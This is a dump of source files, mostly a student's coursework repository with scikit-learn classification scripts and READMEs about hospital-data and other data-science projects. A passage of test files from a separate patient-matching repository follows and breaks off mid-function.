matplotlib.pyplot as plt\nfigGbCv = plt.figure()\nplt.plot(np.arange(1,6), scores, marker='o', markersize=5,\n label='GBT (n_estimators = 300)')\n\n\nplt.plot(np.arange(1,6), scores500, marker='o', 
markersize=5,\n label='GBT (n_estimators = 500)')\n\n\nplt.plot(np.arange(1,6), scores100, marker='o', markersize=5,\n label='GBT (n_estimators = 1000)')\nplt.ylim(0.720, 0.780)\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Cross Validation Iteration')\nplt.ylabel('Cross Validated Accuracy: Race')\nplt.title(\"Gradient Boosted Trees: 5-fold Cross Validation\")\nplt.show()\nfigGbCv.savefig(\"Race_GbtCv\", dpi = 300)\n\n" }, { "alpha_fraction": 0.8135592937469482, "alphanum_fraction": 0.8135592937469482, "avg_line_length": 116, "blob_id": "df34cffbbf419f6b275516a6b8f10fa9aea9cee5", "content_id": "befd909109dfb45c4d0926db4a270009402c12b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 118, "license_type": "no_license", "max_line_length": 116, "num_lines": 1, "path": "/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This repository contains work by David Robison for coursework as part of his Master Degree at George Washington University. 
\n" }, { "alpha_fraction": 0.5127201676368713, "alphanum_fraction": 0.5765877962112427, "avg_line_length": 38.424560546875, "blob_id": "78ebb74736271068c9d4e22f1517efa67d83a1ae", "content_id": "ff22507934c1812752c1782068d88ab68a42051f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11242, "license_type": "no_license", "max_line_length": 164, "num_lines": 285, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/ASOURCE_bNB_Gbc.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 11:23:31 2017\n\n@author: davidrobison\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 10:22:25 2017\n\n@author: davidrobison\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.externals import joblib\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 14).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary Features\n#==============================================================================\n\ndfBernouli = df[[\"ASOURCE\", \"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 
'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\n\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXsourceBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'ASOURCE'])\nySourceBnb = np.array(dfBernouli.loc[:,\"ASOURCE\"])\n\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XsourceBnb, ySourceBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of Race\")\n\n#Begin Pipeline Setup\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[20,25,30])\n\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_micro\", n_jobs=-1)\n\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\nBnbPreds = gsBnb.predict(X_testBnb)\n\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, y_testBnb)\nBnbMatrix = confusion_matrix(BnbPreds, y_testBnb)\n\n# Counter({5: 91049, 1: 34008, 2: 4810, 3: 4109, 4: 24})\n# Percentages: (5, 67.94701492537314), (1, 25.379104477611943), (2, 3.58955223880597), (3, 3.066417910447761), (4, 0.01791044776119403)]\n\n# precision recall f1-score support\n# \n# 1 0.11 0.35 0.17 5207\n# 2 0.01 0.26 0.03 137\n# 3 0.05 0.14 0.07 
700\n# 4 0.00 0.00 0.00 0\n# 5 0.93 0.69 0.79 59956\n# \n# avg / total 0.85 0.66 0.73 66000\n# \n# \n# Accuracy Score: 0.65746969697\n#==============================================================================\nbestModelBnb = gsBnb.best_estimator_\njoblib.dump(bestModelBnb, 'SOURCE_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n# Gradient Boosting Classifier without Re-sampling\n#==============================================================================\n\nXsourceGb = np.array(df.loc[:, df.columns != 'ASOURCE'])\nysourceGb = np.array(df.loc[:,\"ASOURCE\"])\n\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n\nestimators = [50, 100]\nlearningRate = [0.1, 0.2, 0.3, 0.4]\n\nparamGridGbc = [{\n \"clf__n_estimators\":estimators,\n \"clf__learning_rate\":learningRate}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XsourceGb, ysourceGb, test_size=0.33, random_state=43)\n\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\njoblib.dump(bestModelGb, 'SOURCE_GbBestModel.pkl', compress = 9)\n\n\n# Best Parameters: {'clf__learning_rate': 0.4, 'clf__n_estimators': 100}\n# precision recall f1-score support\n# \n# 1 0.91 0.96 0.93 8402\n# 2 0.75 0.56 0.64 1185\n# 3 0.61 0.29 0.39 1101\n# 4 0.25 0.11 0.15 9\n# 5 0.95 0.97 0.96 22303\n# \n# avg / total 0.92 0.93 0.92 33000\n# \n# Accuracy Score: 0.926909090909\n#==============================================================================\n\n\n#Begin Validation Curve for Parameter Tuning \n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 11).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], 
axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXsource = np.array(df.loc[:, df.columns != 'ASOURCE'])\nySource = np.array(df.loc[:,\"ASOURCE\"])\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(Xsource, ySource, test_size=0.33, random_state=42)\n\npipelr = Pipeline([ \n # (\"pca\", PCA(n_components=5)), #actually performs worse with PCA \n (\"clf\", GradientBoostingClassifier(learning_rate = 0.2))])\n \nfrom sklearn.model_selection import validation_curve\n\n#==============================================================================\n# Gradient Boosted Validation Curve min_samples_split\n#==============================================================================\n\nparam_range = [3,10, 20]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__min_samples_split\",\n param_range = param_range,\n cv = 5)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nimport matplotlib.pyplot as plt\nfig1source = plt.figure()\nplt.plot(param_range, train_mean, marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15)\nplt.plot(param_range, test_mean, linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15)\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Min Samples Split')\nplt.ylabel('Accuracy')\nplt.title(\"ASOURCE Validation Curve: min_samples_split\")\nplt.show()\nfig1source.savefig(\"source_min_samples\", dpi = 300)\n# test_mean: array([ 0.91811976, 0.91788098, 
0.91797046])\n\n#==============================================================================\n# Gradient Boosted Validation Curve max_depth\n#==============================================================================\n\nparam_range = [3, 20]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__max_depth\",\n param_range = param_range,\n cv = 3)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nfig2 = plt.figure()\nimport matplotlib.pyplot as plt\nplt.plot(param_range, train_mean, color='blue', marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='upper right')\nplt.title(\"ASOURCE Validation Curve: max_depth\")\nplt.xlabel('Max Depth')\nplt.ylabel('Accuracy')\nplt.show()\nfig2.savefig(\"Source_max_depth\", dpi = 300)\n\n#Test mean: array([ 0.76343317, 0.75716423])\n\n\n#==============================================================================\n# Cross Validation Curve with Cross Val Score\n#==============================================================================\n\npipeGbcVal = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 300, min_samples_split=20, learning_rate= 0.4))])\nscores = cross_val_score(estimator=pipeGbcVal, X=X_train, y=y_train, cv=5, n_jobs= -1) \n# scores: array([ 0.77270353, 0.7319603 , 0.77404671, 0.77341593, 0.76518883])\n\npipeGbcVal500 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 500, min_samples_split=20, learning_rate= 0.4))])\nscores500 = 
cross_val_score(estimator=pipeGbcVal, X=X_train, y=y_train, cv=5, n_jobs= -1) \n# scores500: array([ 0.77106186, 0.72733378, 0.77203194, 0.77341593, 0.77078668])\n\npipeGbcVal1000 = Pipeline([\n (\"clf\", GradientBoostingClassifier(n_estimators = 1000, min_samples_split=20, learning_rate= 0.2))])\nscores1000 = cross_val_score(estimator=pipeGbcVal, X=X_train, y=y_train, cv=5, n_jobs= -1) \n#scores1000: array([ 0.76636072, 0.72830386, 0.76755466, 0.7731174 , 0.77011494])\n\n\nimport matplotlib.pyplot as plt\nfigGbSourceCv = plt.figure()\nplt.plot(np.arange(1,6), scores, marker='o', markersize=5,\n label='GBT (n_estimators = 300)')\n\n\nplt.plot(np.arange(1,6), scores500, marker='o', markersize=5,\n label='GBT (n_estimators = 500)')\n\n\nplt.plot(np.arange(1,6), scores1000, marker='o', markersize=5,\n label='GBT (n_estimators = 1000)')\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Cross Validation Iteration')\nplt.ylabel('Cross Validated Accuracy: ASOURCE')\nplt.title(\"Gradient Boosted Trees: 5-fold Cross Validation\")\nplt.show()\nfigGbSourceCv.savefig(\"SOURCE_GbtCv\", dpi = 300)\n \n\n\n" }, { "alpha_fraction": 0.7987805008888245, "alphanum_fraction": 0.8109756112098694, "avg_line_length": 162, "blob_id": "ae6be5e17e5435b5759603cc86992e83ddfe531c", "content_id": "8be801ca0be1139b555511fe4436131155550ab4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 164, "license_type": "no_license", "max_line_length": 162, "num_lines": 1, "path": "/Introduction to Data Mining/Midterm/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Files in this folder are related to a mid-term project that assessed Military Spending and Gross Domestic Product for G-20 nations using data from the World Bank. 
\n" }, { "alpha_fraction": 0.7817258834838867, "alphanum_fraction": 0.796954333782196, "avg_line_length": 195, "blob_id": "5431133727323bc31a7bf681be21c2d5f4371daa", "content_id": "d989391785dc7ec0d3ad6e997fbec82be1d3897f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 197, "license_type": "no_license", "max_line_length": 195, "num_lines": 1, "path": "/SQL and NoSQL Database Management/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code from my course learning how to interact with SQL and NoSQL databases including Dynamo, Mongo, Neo4j, and Hadoop instances using PyMySQL, Boto3, Robo3T, etc.. \n" }, { "alpha_fraction": 0.8336713910102844, "alphanum_fraction": 0.8336713910102844, "avg_line_length": 491, "blob_id": "0434e48ef9417411d5125d9ec978047e5898d50c", "content_id": "e3d11af6bd90f29af9651b3f082ec104c8004523", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 493, "license_type": "no_license", "max_line_length": 491, "num_lines": 1, "path": "/Introduction to Data Mining/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a report from my Introduction to Data Mining course. This course explored the use of Python pandas, numpy, and matplotlib packages for cleaning and wrangling multiple data sources, performing numerical operations, and visualizing data. My term-projects focused on demonstrating ability to use packages by analyzing World Bank military spending data and state-level community health and hospital readmissions data from the CDC and CMS. 
\n" }, { "alpha_fraction": 0.8244680762290955, "alphanum_fraction": 0.8244680762290955, "avg_line_length": 186, "blob_id": "fda87165773a76ae3e45bfdde380fd9e98364c4d", "content_id": "42a85aeed5e39589249ed3f0adb77168bdac4465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 186, "num_lines": 1, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This code contains python scripts for running Bernouli Naive Bayes and Gradient Boosted Decision Tree classifiers for variables of interest in this project. The primary author is David Robison. \n" }, { "alpha_fraction": 0.8449304103851318, "alphanum_fraction": 0.8449304103851318, "avg_line_length": 501, "blob_id": "5b1e22620e7d2849683a3ce4af20fa5e04c0b0b3", "content_id": "18edbb876cbac2aa87d6e74dbc0dc5a1554e0b56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 503, "license_type": "no_license", "max_line_length": 501, "num_lines": 1, "path": "/Bayesian Methods/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a report from my Bayesian Methods. This course explored foundations of Bayesian data analysis and application of Markov Chain Monte Carlo processes for parameter estimation, prediction, and model comparison with R packages of JAGS and Stan. 
My term-project compared performance of Bayesian and Lasso Regularized Logistic Regression, and Random Forest for predicting diabetes hospital readmissions using data from UCI Machine Learning repository\n\n" }, { "alpha_fraction": 0.9024389982223511, "alphanum_fraction": 0.9024389982223511, "avg_line_length": 40, "blob_id": "34d29c0cde5ea1d6a1f6c0f185f4b5baa54fbf69", "content_id": "a14d786222f7bafe95798db171d72445d169f93b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/Introduction to Data Science/Visualizations/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Exploratory Data Analysis Visualizations\n" }, { "alpha_fraction": 0.828125, "alphanum_fraction": 0.828125, "avg_line_length": 62, "blob_id": "46a00bee6da25be135363c5341e617bf150dde73", "content_id": "8b95d7ab05d7c4d0f7634eb9e1c933bfe3f91201", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 64, "license_type": "no_license", "max_line_length": 62, "num_lines": 1, "path": "/Machine Learning I/Final/GridSearch Figures/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Figures from gridsearch for optimal tuning parameters for MLP. 
\n" }, { "alpha_fraction": 0.8403100967407227, "alphanum_fraction": 0.8403100967407227, "avg_line_length": 213, "blob_id": "3229ae1b3e50c7df9b7646781d573590a5255a21", "content_id": "bad176f120950a76e91d48d9ab9b4c079da32fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 646, "license_type": "no_license", "max_line_length": 320, "num_lines": 3, "path": "/Machine Learning I/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a report from my Machine Learning I course. This course investigated parametric and non-parametric supervised and unsupervised machine learning models with focus on Bayesian inference frameworks and neural networks as well as techniques for dimension reduction. \n\nMy term-project used scikit-learn and keras Python packages to compare the performance Naïve Bayes, Random Forest, and Neural Network models for multi-label classification of variables in the Healthcare Cost and Utilization Project hospital dataset with use of synthetic resampling techniques to address class imbalance. 
\n\n\n" }, { "alpha_fraction": 0.5117626786231995, "alphanum_fraction": 0.5773951411247253, "avg_line_length": 37.33987045288086, "blob_id": "18f219f08e98592cce4b267d14c262b1514883a1", "content_id": "c9a93ecd793d00bdfe97d89b4e330652a35d05c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5866, "license_type": "no_license", "max_line_length": 164, "num_lines": 153, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/TOTCHG_bNb_Gbc.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 29 10:48:38 2017\n\n@author: davidrobison\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.externals import joblib\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 16).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\nlabels = ['1', '2', '3', '4', '5'] #just class labels we'll call 1-5\n\nbins = [0, 1000, 5000, 10000, 20000, 1500000]\n\ndf = df.assign(TOTCHG = pd.cut(df.TOTCHG, bins, labels=labels)) #add a new column with our cuts\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary Features\n#==============================================================================\n\n\ndfBernouli = df[[\"TOTCHG\", 
\"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\n\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\nfrom sklearn.preprocessing import LabelEncoder\nlabelencoder =LabelEncoder() \ndfBernouli.loc[:,\"TOTCHG\"] = labelencoder.fit_transform(dfBernouli.loc[:,\"TOTCHG\"].cat.codes)\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXtotchgBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'TOTCHG'])\nyTotchgBnb = np.array(dfBernouli.loc[:,\"TOTCHG\"])\n\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XtotchgBnb, yTotchgBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of TOTCHG\")\n\n#Begin Pipeline Setup\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[15, 20, 25])\n\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_macro\", n_jobs=-1)\n\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\nBnbPreds = gsBnb.predict(X_testBnb)\n\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, y_testBnb)\nprint(BnbReport)\nprint(BnbScore)\n\nbestModelBnb = 
gsBnb.best_estimator_\njoblib.dump(bestModelBnb, 'TOTCHG_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n# Best Params: {'feature_selection__k': 25}\n# Distribution: [(4, 32.88208955223881), (3, 24.6955223880597), (2, 24.459701492537313), \n# (1, 17.313432835820898), (0, 0.6492537313432836)]\n# \n# precision recall f1-score support\n# \n# 0 0.00 0.00 0.00 0\n# 1 0.45 0.36 0.40 7065\n# 2 0.30 0.33 0.32 7313\n# 3 0.16 0.30 0.21 4328\n# 4 0.68 0.52 0.59 14294\n# \n# avg / total 0.48 0.42 0.44 33000\n# \n# Accuracy Score: 0.415848484848\n#==============================================================================\n\n\n#==============================================================================\n# Gradient Boosting Classifier without Re-sampling\n#==============================================================================\n\nXtotchgGb = np.array(df.loc[:, df.columns != 'TOTCHG'])\nyTotchgGb = np.array(df.loc[:,\"TOTCHG\"])\n\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n\nlearning = [0.1]\nsamplesSplit = [30,50]\n\nparamGridGbc = [{\n \"clf__min_samples_split\":samplesSplit,\n \"clf__learning_rate\":learning}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XtotchgGb, yTotchgGb, test_size=0.33, random_state=43)\n\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\n\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'TOTCHG_GBModel.pkl', compress = 9)\n\n#==============================================================================\n# Best Params: {'clf__learning_rate': 0.2, 'clf__min_samples_split': 30}\n# precision recall f1-score support\n# \n# 1 0.81 0.52 0.64 232\n# 2 0.75 
0.73 0.74 5627\n# 3 0.63 0.70 0.66 8025\n# 4 0.63 0.57 0.60 8162\n# 5 0.85 0.86 0.86 10954\n# \n# avg / total 0.73 0.73 0.72 33000\n# \n# Accuracy Score: 0.725757575758\n#==============================================================================\n" }, { "alpha_fraction": 0.8363636136054993, "alphanum_fraction": 0.8363636136054993, "avg_line_length": 53, "blob_id": "08b440b866aca4f19ff585e47fd4f847c27b5603", "content_id": "4e16d2ae7505aecc9a61153d075a3211e00fd885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 55, "license_type": "no_license", "max_line_length": 53, "num_lines": 1, "path": "/Introduction to Data Mining/Midterm/Visualizations/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains visualizations from the project. \n" }, { "alpha_fraction": 0.8274853825569153, "alphanum_fraction": 0.8274853825569153, "avg_line_length": 340, "blob_id": "bd1044e03e5af764b6e0340835154248d9e64d0f", "content_id": "6d06437ae6335ab25fb6e1d28bc8ef9e87b21b9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 342, "license_type": "no_license", "max_line_length": 340, "num_lines": 1, "path": "/Introduction to Data Science/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "The files in this folder contain code visualziations and a Powerpoint report from my Introduction to Data Science Course. This term-project analyzed roadway data collected by the City of Philadelphia to predict probabilities of seatbelt use by vehicle occupants involved in accidents, creating risk profiles by age, gender, and time of day. \n" } ]
23
ousamg/patientMatcher
https://github.com/ousamg/patientMatcher
3d11979d833ee162203227aadac99e27ef7f3f15
c5411e1a01ada9c2e4033ce54c55b5f2c954cdac
55a8c3134eb492fa59152f342c69969faee02d72
refs/heads/master
2021-06-27T01:56:03.151146
2020-10-19T12:57:56
2020-10-19T12:57:56
167,567,777
0
0
null
2019-01-25T15:21:59
2019-01-25T11:58:19
2019-01-25T13:18:09
null
[ { "alpha_fraction": 0.7061118483543396, "alphanum_fraction": 0.7145643830299377, "avg_line_length": 45.60606002807617, "blob_id": "1370712491d9e7dc430f76f22858af34fb3762a9", "content_id": "1ffee9df62d00e81c607df2dc905eea551232705", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1538, "license_type": "permissive", "max_line_length": 93, "num_lines": 33, "path": "/tests/parse/test_parse_patient.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom patientMatcher.parse.patient import features_to_hpo, disorders_to_omim, mme_patient\n\ndef test_features_to_hpo_no_features():\n # Make sure the function returns [] if patient doesn't have HPO terms\n result = features_to_hpo(None)\n assert result == []\n\ndef test_disorders_to_omim_no_omim():\n # Make sure the function returns [] if patient doesn't have OMIM terms\n result = disorders_to_omim(None)\n assert result == []\n\ndef test_mme_patient_gene_symbol(gpx4_patients,database):\n # Test format a patient with gene symbol\n\n test_patient = gpx4_patients[0]\n # Before conversion patient's gene id is a gene symbol\n assert test_patient['genomicFeatures'][0]['gene']['id'].startswith('ENSG') is False\n mme_formatted_patient = mme_patient(test_patient, True) # Convert gene symbol to Ensembl\n # After conversion formatted patient's gene id should be an Ensembl id\n assert mme_formatted_patient['genomicFeatures'][0]['gene']['id'].startswith('ENSG')\n\n\ndef test_mme_patient_entrez_gene(entrez_gene_patient, database):\n #Test format a patient with entrez gene\n\n # Before conversion patient's gene id is an entrez gene ID\n assert entrez_gene_patient['genomicFeatures'][0]['gene']['id'] == \"3735\"\n mme_formatted_patient = mme_patient(entrez_gene_patient, True) # convert genes to Ensembl\n # After conversion formatted patient's gene id should be an Ensembl id\n assert 
mme_formatted_patient['genomicFeatures'][0]['gene']['id'].startswith('ENSG')\n" }, { "alpha_fraction": 0.808080792427063, "alphanum_fraction": 0.808080792427063, "avg_line_length": 8.899999618530273, "blob_id": "8fff7355c481440437a839dbbbd4b708a29d8104", "content_id": "89fea8de34dfd85ca0740e3ea098c68add0b8fc2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 99, "license_type": "permissive", "max_line_length": 22, "num_lines": 10, "path": "/requirements-dev.txt", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# testing:\nclick\npytest\nmongomock\npytest-cov\ncoveralls\n\n# server-related stuff\nrequests\nFlask-Mail\n" }, { "alpha_fraction": 0.6741405129432678, "alphanum_fraction": 0.695067286491394, "avg_line_length": 34.21052551269531, "blob_id": "e17cb73d3abcd91a040269775ddc0f8af5f529dd", "content_id": "b41a24c17193821d3332d7d97075735d2b217296", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1338, "license_type": "permissive", "max_line_length": 69, "num_lines": 38, "path": "/tests/utils/test_ensembl_rest_api.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport tempfile\nfrom urllib.error import HTTPError\nfrom urllib.parse import urlencode\nfrom patientMatcher.utils import ensembl_rest_client as ensembl_api\n\ndef test_ping_ensemble_37():\n \"\"\"Test ping ensembl 